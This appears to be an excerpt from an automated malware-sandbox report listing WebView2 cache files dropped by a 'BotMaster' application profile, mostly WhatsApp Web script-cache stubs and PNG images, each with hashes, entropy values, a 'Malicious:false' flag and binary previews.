                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00001c

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):307110
                                                                                                                                                                                                                Entropy (8bit):7.998346865766936
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:6144:IYFBHOlcf0q70z2Yn5Q5DFgDeoT65LBzHmOxr88iQ:IYFBuqMq70z2jxY6XmOxr7
                                                                                                                                                                                                                MD5:C3596B9D76447863A6D090063BF6900E
                                                                                                                                                                                                                SHA1:439B20C688ECE7888DC692B2AE1299D2C83A6C5F
                                                                                                                                                                                                                SHA-256:638FED787D3AA7A48B9D5354326D1FA94ED3EE26FF201674F67EB1BDBBFE2350
                                                                                                                                                                                                                SHA-512:C7870E589191151D6525A4B28E78610CFA557DB6CED1834D6173E0F1344F6F5EE03FDFEF783231B453AB382F5FA71B679596C7919E06D497CF0B4D1F127322B9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.......... ........yX6DY.8......:..kOZm...................?.c?.S?.s..K..k..[..{..G..g..W..w..O..o.._.......`................................\.q.....<{......|......7...W.Q...;.._)._;....I1.i........<.k..t.S...vv%/.P0+[... ....z.........6.au...n.Q.C:d.A<X.d.}.L.*$...[A8.RaY..W...M.....-...xc.4...v.*CI+.*@.B-.....~.... .[...T.....M...a..tdq"_.Wq4.|+.}......np....f...@..R.m.i.%)....?.....D......a.i.L.6.3.tO_.;%.cP.H.t ./.7...dm.W=.....C..+{...bO...."..2. .M.("-j.....!j.....V!i..xsqi&lB\.>.......m..=TEv.A.{>.4..Wp.()......|_....b.r.a.!..e..NI...8v..... .)aB.........U....pt......$..,.e.zF..Y.QFD.......J.....j__."+..i..../...n..fk.N.I3*X.%.@.........o........[...6.tKh...T...xBTl..2i@yW.;..~.HWB.p#[....R..!.& ...E...= M.y`D....._.._.H...'.W....m.8YHl[..h......~..kX....<.......U.....P....G.Br..<../.C.......!.......ht...c)6.QE^J....o3D..u.%]........I.]...[]...]w.y.*......._...H....O..%...v^;....../@.....I.............^y)..1..8.b.m=.FH.."K.$....T.t.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00001d

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 583 x 484, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):62578
                                                                                                                                                                                                                Entropy (8bit):7.959490943436189
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:MnbphH4wC+qLF74IBT9WAtRIKW2NW+pru0QOpKcvUAa:EhHhx+2I6wIKW2AkRpKcMAa
                                                                                                                                                                                                                MD5:423C0C682A19B7002FCC7AC412F302DF
                                                                                                                                                                                                                SHA1:9245CD1DD4D7E3AF284E72B2DF9A5214813BD319
                                                                                                                                                                                                                SHA-256:802FE6014F0E19C3355162321B3B1C1D54801F27021075FBDA3F39970A55BB4D
                                                                                                                                                                                                                SHA-512:56BE4DBA7E9F05248536CEC97EDB22F164B33128B19E39F48D99AC314D73D3E00730DE645AF5076C26A371466152CB2397799A60E9EDD2961FD3E9C65C3C7F24
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR...G.........4#.*...?iCCPICC Profile..H..W.XS...[..@h.P.....UJ.-..t........*....ZP...].Qp-.,*"..E...........u_..|...3g.s...3...pD.\T..<a.864..... =.d0.h..0.p.E..H..p.....@..e{).?..k..... 1....y...........z...")....0@..Jq..WJq....... n.@I...g......Bn&.P...Q....Pc@.7..q....F....3.;..q..pr8.#X>.YQ...r93..t..+..a.E%K..+.3.....R..q.0=*.bM...x2{.QJ.$,An..p.Y0g...#.......!..H.>=C.....t........K...q..m.._h}...T..r.2.R_.$9.L...,>[....e.'AL..P....*...9q....EY..a..$V..9.|ah...+....*.K...m......`AV|.<?X..#..........<.......A..cO..8..{QA`../N...(.qS~n.To..k~a../.X.'............9.1.x.U ..@.\q.(.`*......~.&o... .........I..!|.".'D|.?./P....P.eD+...Yk..G.x.q.....]".%....A....9P.0.\(......~.0.&R...{d..[...A.0b......p.<.>..8...8.........W.=..S...?D9..@..E....n.9..@...Cf....{...a......qK.....o#..k(..d..C. [..S.V.m.E....#.5}$........>...?ZbK.CX;v.;.5c............G..5.-V.O.......f2......?C.G..T.L. 3......>.-.:.f8;:;. .....t.......[d.......o...

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00001e

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 202 x 403, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):44604
                                                                                                                                                                                                                Entropy (8bit):7.992061149219894
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:1IBIrmfHz/ecpktyvaejXLS4Fgt04xDBCRSRigP5uM5vK:12fTWcpuCPw0oD00B5i
                                                                                                                                                                                                                MD5:F2CB5F4893E977C85ADB5492F63ED4F2
                                                                                                                                                                                                                SHA1:F90A20319611702E03DEE77FC515837D80A4EE6D
                                                                                                                                                                                                                SHA-256:AD474B2E7680BAD87EED455835B3A1558C12D92F5EBB696337C1C827FF772007
                                                                                                                                                                                                                SHA-512:DD04F18040761FFEB554EB023B9CEE4FCCC198AF15496CAB3B34AA1C01DB8D7211A1B938A4DD268F3939FEDC49F600BFDFBE0A8EDA77FC4A2E2CF045BEB3A9BC
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR.............^M}.....gAMA......a.....sRGB.........PLTEGpL..................***..........B0..........-............i.fN.........U=....~......._.]=.bR......lR[7))..).. ...../..,! %..$..0#!...9*&...>.*.........M'#...;..5&"...=DU+&......D# ....../.....h4)~(1_.'D3-.|W............7?...]:.Y9.tR...G94.07i.(.4<.FKq9,.BHr$,_.%bVV.8@...M...b=...V."K=<C..$...>E.kK.pPDC...cB..b.vX...g\].O8..0&(WJIpca\PO...R:{=-?35.W<~08.[?.R67+-8..._Cujk....~D2u,4.z.eI\6.78D.......lh'.....:...e@3.f.y.b....qtC3.lNO4.....L9...D2{pt.oc.K3}VE.a.....NR.X[U@8.]b...|....PU.@F$!,wM?.....X......jm;@P^IA.FK.xt....bb.nJ...PL.......=B........h56...lI<..s.....gK....\F.....t.....~`T.]f...p\S....yx.PVkQI..t<?............ia.D/.zj.pp.I.Z[.xa.Z.}..kU.^U...rz.o^.|....tF...GEO.pm.........MO^...b`k..........~~....76....%tRNS.........."YI1YIKZ.XZZ...H.H....q./..@.... .IDATx..=k.I..u.mi./....>./7...@.UTV.T...J61....;p....wvL4..l<.a...X..=5.}g.....*.Q.......y.>:..w.n..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00001f

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 326 x 647, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):49990
                                                                                                                                                                                                                Entropy (8bit):7.986844398314995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:QIuXOX95I0A9mbwnG4RtjCS4NLldssabrU73hqBkkZAbXW7V59o7iuKU9STQS:SY9xA9NnG43jCS+LPuw73hf1muOuK63S
                                                                                                                                                                                                                MD5:ED61516E8112DE85752251372EC2618B
                                                                                                                                                                                                                SHA1:389AE2F9734644A6D195019A0F35A5D7F1C78AC6
                                                                                                                                                                                                                SHA-256:85EB4E754B066AFCFCC196BCAAC2FF78413285E64EFD9889F2ADED5C587DBAB3
                                                                                                                                                                                                                SHA-512:0DF2360B832C4E48853ED08B0CCE9DC933ED6A58CCECB3BFA9974344695805A6C6881075D4AC930EC6DAD60445AD4AF3E39F8572B0B7922F798EB6F86E464CE1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR...F..........U.N....gAMA......a.....sRGB.........PLTEGpL..................^^^....................i...ux~_`d.}f......`A2;@..!.o.....i................sv{...ux~wz..$.134......678!$&psx. %()jknfgj-/0CEF.*..1.),,:<<>@Amptace.[...n.9"HIJVY[z~.MNO..N....i...}...(=(....6!L]L...EWF...j.H]^_....A.N.STT&3".......@%...+I,w/.?O>SdS6K5Lf?VlI......!E&N#....6Y1............>^92A.......,).D..t&......@..\oZ..m\"...J...LZ8eqO#-3...jy]..uf/....)6>......+T+.P/n#.am;.~C...lyCKRW..YL\#...AP/...:O ...........p;#.,-...Yj+2>F3> ....a.. 8-!.........b8{v9..q.Y|.U.....@JQ...db.....-CW.?@.-/.u<...k+.........1.....UG....O;....u.X&.<2...a....Qc]*sj*...H@%...}wI......k.......?Te..z...SI.....z.NN.4s.h...sBp.>.eW.....W7(.w...*..r...}iYL-......|.sC.laQcr.ol.[Q.W.qbF..PsJ=...]..........T...\~.w..&w...EGt...c..$j.......tRNS........... ..@..........H... .IDATx...k.I..;J2R....4....'q.;........Ld...=...9......!...0.-......z..:.u,(.mN[..0....?.V..c%(.~.[.].....W.uu.q.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):524656
                                                                                                                                                                                                                Entropy (8bit):4.989325630401085E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:LsulaU:LsC
                                                                                                                                                                                                                MD5:26B006940C545C695A01D2AE6CD763FF
                                                                                                                                                                                                                SHA1:0ECAD922579281D5D855430ECDD1F2A09A9EB3E3
                                                                                                                                                                                                                SHA-256:4242128406A422C48C6C233CED933B3831DD06840FB0ED6FB7FF3381E32410A6
                                                                                                                                                                                                                SHA-512:7B3FD29B6873E587B4FD6DD0D464B870D55EB2AA354BBA99D91CFA824B3A6D0A84FF8D1B64898191329E8D9C9EE50C6337CFC39B94B89B400FD26C2D5685C20A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................[..q.q/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\030a56d6f261fcec_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):227
                                                                                                                                                                                                                Entropy (8bit):5.35006901119788
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mKYYRiUKSVU4dJ4vAH6tJlb0rwzFBprbIS:/tKSVVf446ZcwPt
                                                                                                                                                                                                                MD5:E4ABCF3B09B628EBE22D9BF718307FBE
                                                                                                                                                                                                                SHA1:1854D6C3C914CDEBD9DDB405D253CE69C4EB1446
                                                                                                                                                                                                                SHA-256:82DDC430ADE47811F8C99360E47E33B97A21EE3E63974F935C5BA3356F73F42F
                                                                                                                                                                                                                SHA-512:6F23D5A7BDDE45C6C45FE4E6C53E86DB7A1E8C2DA8E7B0D4C2EDA80D397656AC91D5D248785433032AE27F27F1A79A9B409AE7827628700059D6F5B9A28D7EB1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......W.....A....._keyhttps://web.whatsapp.com/vendor1~app.264a01b6133c4a120327.js .https://whatsapp.com/.A..Eo..................s..r.q/.........Z...........x.a......._.W..(8C..9.N2..V...>....(2|.A..Eo.......V.$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\158f5bd06717d691_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):221
                                                                                                                                                                                                                Entropy (8bit):5.320191656264784
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:m0/lXYYRicfEHd4vAH6tuQlQMXgBUK9aN:Fdfm446YXUK9Q
                                                                                                                                                                                                                MD5:0F50A01CDDC3BD73596C604E50336F6E
                                                                                                                                                                                                                SHA1:4A078349B2428E8E2707A59CA51F09597E07114F
                                                                                                                                                                                                                SHA-256:18DB4038B5833F10F9AE232A992627E88B180BD51A7ACE4615FEBB88A9843226
                                                                                                                                                                                                                SHA-512:FF0C8AA80C69667EC9393CD88053EC416AB13642B6B241BDA1E06D24F2320B71EDA1B4698CE87BA5C390DD38EFA3698507D98EEFA37AE1FBCD15BF91D9505925
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......Q....XWu...._keyhttps://web.whatsapp.com/main~.f4046bd714178dbbb8c1.js .https://whatsapp.com/.A..Eo...................I.r.q/.........Z.............a.....mQ.c...5...../.._.x....W.m...y..A..Eo.......o..$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\252cfc6f27a294b1_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):236
                                                                                                                                                                                                                Entropy (8bit):5.374710518594934
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:m4/YYRiGrHLUiPCVd4vAH6tDnlREc+0HAa/:977LUsCb446hp+4B
                                                                                                                                                                                                                MD5:92A3C9465F7F18094A2A9CC945ADAB7C
                                                                                                                                                                                                                SHA1:0B0F2CEC6C61E10E74D19C72911C54444E5E3C67
                                                                                                                                                                                                                SHA-256:B8715111495E8739727789CBB93D4D2236733EBC0E86C341A824228B9C3BB612
                                                                                                                                                                                                                SHA-512:EABBA617713C35557EC24ED45A3B819A71EE9FE426F54106507A7CC946356A8820F1E87D41C4EF7401BD4E41D952E1B2004B6D0F41E5F04518C2E820958F43D2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......`.........._keyhttps://web.whatsapp.com/moment_locales/en-GB.1a0883d124f255e1ccfa.js .https://whatsapp.com/.A..Eo...................u.r.q/.........Z...........u.a.....J..!9.B...nt!y?.N'17>.$=.i33.4.A..Eo.......!.&$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\3c310027e3b85e7d_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):220
                                                                                                                                                                                                                Entropy (8bit):5.332872993071043
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:m+lQx5l/6v8RzY5GWWinnVxdHsssRXERWEDAom5kt1UmHPt/laXESBljBVUUcgmA:mTXYYRinVxdJsd4vAH6t1UQlsEEl3qA
                                                                                                                                                                                                                MD5:FCD6B6C4360078FDC854F8040E18ED2F
                                                                                                                                                                                                                SHA1:321C1BF78EB24240C39CF0113F15305C8DCDECA2
                                                                                                                                                                                                                SHA-256:6E28957B2007DBC0CCF1364CFFA3132A93E1D496501DACD4B4DC161A529A41FB
                                                                                                                                                                                                                SHA-512:B9E9F382E2E19F953220A4017130EEDA92A6C194510B71203A55EC648CEB7CF3C2BFA9B944C19E405F4CB2B07232C7DDF4599A725D681CF9040362A17ABBE99E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......P...m.[....._keyhttps://web.whatsapp.com/main.3d4bb07beea083ab8b3a.js .https://whatsapp.com/.A..Eo.....................s.q/.........Z...........w.a.......=..g....'wBG.@.`..k..1.5....s.A..Eo.......~.V$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\5bc7517a7edef195_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):223
                                                                                                                                                                                                                Entropy (8bit):5.309127383483225
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:msBr/VYYRiQOdkYDd4vAH6tpQlrqFCpvClEk+4Dt:Bt/J5Q446MqFCZk+Mt
                                                                                                                                                                                                                MD5:FA2321585337380604143077A49FF5D0
                                                                                                                                                                                                                SHA1:75C000CE44100195C22617ED6F7F81B09C814732
                                                                                                                                                                                                                SHA-256:9DE6D5511C758EDB52214B6A5DB37FE8B38D811E22F369168BA67B7AD435DDA2
                                                                                                                                                                                                                SHA-512:436E89F4FD2C9D35B0FB60685567BEB254F628AEB657F9681EC9F3C5FA15A182BB254790BF2F68CDC67194C0814711C84F0F2E6C4FBAF6BF0FE66CB4A66FB540
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......S...uo......_keyhttps://web.whatsapp.com/runtime.cf3d9387a416c75bf2cf.js .https://whatsapp.com/.A..Eo..................@..r.q/.........Z............a.......Ai}..H..e./5sF...q.+i.q..;p...A..Eo......D3.J$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\69d5c4b8b78d9bc9_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):225
                                                                                                                                                                                                                Entropy (8bit):5.325457076100812
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mXltVYYRiUzdSd74vAH6tdRlwouxBm4zT:Cp0d7446MdZT
                                                                                                                                                                                                                MD5:96A619B76755A0AD96CD09DE0D05C9CE
                                                                                                                                                                                                                SHA1:2B12FBFFBF6946C975439A85DF3B32F4704BA29D
                                                                                                                                                                                                                SHA-256:0146947EC6952046DA24DAD468E657A91CF0328D647546F005B350C968CC04C2
                                                                                                                                                                                                                SHA-512:E73F50F00964C2F11C94FB45FE7F43BDF65CD33E8B35674E9E0546D4435D488D532E6F45F2A14F69CD7C17C5BAC7AF64A7D9A3C24D10E4B26EF1185154A22482
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......U...5.A....._keyhttps://web.whatsapp.com/libsignal-protocol-ee5b8ba.min.js .https://whatsapp.com/.A..Eo..................@..q.q/.........Z...........).a........H*+.....4;...`...;;k&...G.[`.A..Eo.......+Q.$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\760f36b75e644202_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):255
                                                                                                                                                                                                                Entropy (8bit):5.584665380142625
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mMnYk+VvXjWosJ/XBryhmX4vAH6t7C9lWM4g9CHS2c:p+hjqJpWkX446ji9CH
                                                                                                                                                                                                                MD5:048A97D6F818DBEF167E69883111ACDF
                                                                                                                                                                                                                SHA1:7EBE3ED098B5D8EF497E29DF4F14E343F68DA254
                                                                                                                                                                                                                SHA-256:99E5020DACB63E5984B44005519440A5B7A2F9254084437B62C1850270683632
                                                                                                                                                                                                                SHA-512:60876CDABF49C76B577990D170D26C8F5A47D230BC1C82E30805EEB07E56EDAB23AF243010165C20C7DC502906379402491268EC6D14A35BC669A3704D41506A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......s..........._keyhttps://static.whatsapp.net/rsrc.php/v3ihVQ4/y5/l/en_US/HalbLyIrdwA.js?_nc_x=Ij3Wp8lg5Kz .https://whatsapp.com/.A..Eo....................]s.q/.........Z.............a........l.....'.5.......G.3.C.^S/....A..Eo.......@TB$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\88268006280a6293_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):228
                                                                                                                                                                                                                Entropy (8bit):5.396898989730739
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mKLYYRiUKLGFSnb4vAH6tNKRlcGf9vjlU2v9pK4q:5tK6F+b44609v9
                                                                                                                                                                                                                MD5:64448DA908A871470EA543A4B573B420
                                                                                                                                                                                                                SHA1:226CD99C32452491686197187682269DB60031E5
                                                                                                                                                                                                                SHA-256:20B3A9C9AF690FE6335F65FFCA8A863546E0FCA1CE5A05EBE026E992D2B899EA
                                                                                                                                                                                                                SHA-512:C0FD5F4D668962E18A589AAD9FCBF07C64FF814BB401679C2C17FB9F562C6FD789735689F7FAC4D220EB06C5218ECB3E304B94DF1DFA54927A1E70F1044302AE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......X.........._keyhttps://web.whatsapp.com/vendors~main.75ffa609850dd95ab8d9.js .https://whatsapp.com/.A..Eo..................m?.r.q/.........Z.............a......;.:0...~D.....\.....7}.5.4oQL..A..Eo......2..#$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\9fcb805056b87417_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):244
                                                                                                                                                                                                                Entropy (8bit):5.483294233478292
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mol9Yk+VvXjZ1g5hmX4vAH6tQ+nlwaxR+TU/prVl:Jll+hjZ1g5kX4463L+wxhl
                                                                                                                                                                                                                MD5:CC8569348D838D24A8EE948524E676B2
                                                                                                                                                                                                                SHA1:1E31DBB9EAD44ED487D1700C35F28D7D07C1522A
                                                                                                                                                                                                                SHA-256:3B5FE6DE9DD6543297F54147B3A43AE40B8564D60ACE84DE379545F761C69AA3
                                                                                                                                                                                                                SHA-512:9EEB9602AB9DD981526F789430053E0FB0D4D2CADE8E78D1DAA0C7BEE15AC80EB20CE9196FB871FE3C7046B0297934CB5E1C86AB914D536594B454E575A0F580
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......h...u......_keyhttps://static.whatsapp.net/rsrc.php/v3/yr/r/_ElV2y1OxOx.js?_nc_x=Ij3Wp8lg5Kz .https://whatsapp.com/.A..Eo...................<.r.q/.........Z.............a.....~i...z..h9o......Q........X.&.A..Eo........*.$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\ae4b8ee53c0d46c5_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):244
                                                                                                                                                                                                                Entropy (8bit):5.496765366584046
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mzVYk+VvXjahmX4vAH6tcglwXBUnG3A2:0+hjakX446WZXB9
                                                                                                                                                                                                                MD5:7CB966A1AC69977CAE2FD1B0676E8832
                                                                                                                                                                                                                SHA1:CECFE2EC2E64CC6E1B41D026855C89CF973899F8
                                                                                                                                                                                                                SHA-256:B7CFBE160DA6DE7739C2DBA99848929A931F682026A74B18B1F393001F9C4792
                                                                                                                                                                                                                SHA-512:ADE7076B896F0AD4B846E16D70709B575B50B2BE57790B8173A577FAECE314779E9C2C664AE3070BA8B2E46C5087B155D909A4227121CFD9BE1BA7D559567575
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......h...@.~...._keyhttps://static.whatsapp.net/rsrc.php/v3/ym/r/O-z1wbECBVC.js?_nc_x=Ij3Wp8lg5Kz .https://whatsapp.com/.A..Eo..................h.$s.q/.........Z.............a........:.I.=..O..%...f...j..U.x6...A..Eo..........$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\af997f9451df2953_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):255
                                                                                                                                                                                                                Entropy (8bit):5.51503270697796
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mjVYk+VvXjWNbe2Q7dwhmX4vAH6tBlWEFHq6P19kP4:0N+hjr2QdwkX446IEqY+
                                                                                                                                                                                                                MD5:CEEADFED436A209959E54DD9AE92E7B0
                                                                                                                                                                                                                SHA1:3E23DB8B09CA1D485C40DC3F64B752EEEE930330
                                                                                                                                                                                                                SHA-256:1ED7A10A91A24DEA6F8C5746FDB7718DCBB4736CAA052AE78B33DBA57C6CE6B6
                                                                                                                                                                                                                SHA-512:B093E74201D867E893929902C414A4221F4637BE5E18ABE11E3AEA412E8017D5998EC092513F4AB8366EB66CEFD2D1182AA209ADC321CC0B7D1F7ECF6C4E255E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......s....n.r...._keyhttps://static.whatsapp.net/rsrc.php/v3i7M54/y4/l/en_US/8csXZcJFpSu.js?_nc_x=Ij3Wp8lg5Kz .https://whatsapp.com/.A..Eo....................:s.q/.........Z.............a......:..;.....:.`5...j.8..aD.J.}....A..Eo.......^.$.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js\cf44d561dd7e13e3_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):244
                                                                                                                                                                                                                Entropy (8bit):5.4457961977698535
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:m9XYk+VvXjwDsgBhmX4vAH6t6Rlg/l4Mq6I3YNU7aB/l:o+hjOBBkX446zWscYP
                                                                                                                                                                                                                MD5:768C29CD3AF9D6071B4A4BEC90612B48
                                                                                                                                                                                                                SHA1:4923C7975E9839813FB02F5BF89D9CE84D3928C9
                                                                                                                                                                                                                SHA-256:FBA855EC4E9B54A53AD804B1E9586110C326E1FAE5A766227A951F62B102733F
                                                                                                                                                                                                                SHA-512:B82E8C57A7DD3BA289C39CED4A2CDC26135BCDA8CC12C4874FB3ED8629BD34A70CE538873122645604C80B85D3664E37EA3459B290730A5E913EC40A23F73C0C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......h...8.%....._keyhttps://static.whatsapp.net/rsrc.php/v3/yH/r/FaKmSZnGIEy.js?_nc_x=Ij3Wp8lg5Kz .https://whatsapp.com/.A..Eo.................._.:s.q/.........Z...........;.a....."|Qf..:.N./..D*.7.^.n...}fE...A..Eo..........$.......

